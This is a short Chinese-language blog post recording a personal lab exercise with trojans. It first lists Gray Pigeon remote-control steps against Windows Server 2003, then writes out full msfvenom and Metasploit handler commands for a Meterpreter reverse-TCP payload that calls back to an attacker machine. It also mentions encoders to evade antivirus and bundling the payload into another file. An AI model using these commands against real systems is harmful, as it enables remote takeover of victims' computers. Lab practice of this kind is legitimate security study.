木马攻击

前言

最近在学习木马攻击方面，做了一个思维导图慢慢来学习。

不过凡是还是要从实例开始，对木马进行了大致的了解然后绘制了个脑图之后就要开始动手啦，下面记录一下我的学习过程

ps:这里可能还需要补充

灰鸽子远程控制

攻击机：Windowsxp

靶机：windows server 2003

1.配置IP

2.生成木马

查看是否生成成功：

利用ipc$暴力**

上传木马并且计划任务运行

默默等待主机上线

然后就可以任意操纵啦，实验完成之后还能帮server 2003关机~~~

msf生成木马连接我的Windows主机

攻击机：kali
靶机：win10

利用msf生成木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.11.129 LPORT=4444 -f exe >wangzhe.exe

会在当前路径生成一个wangzhe.exe 然后将其拖到windows下发现会被查杀

这里可以用编码器试一下能否实现免杀，定制编码器针对不同的杀软会有不同的效果；

这里先不考虑如何绕过安全狗，所以先关掉电脑管家

使用exploit模块

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

show options

set LHOST 192.168.11.129

set LPORT 4444

exploit

执行命令

可以进入shell的环境执行命令，乱码是中文只需要调整终端的编码。

简单捆绑实现

完毕！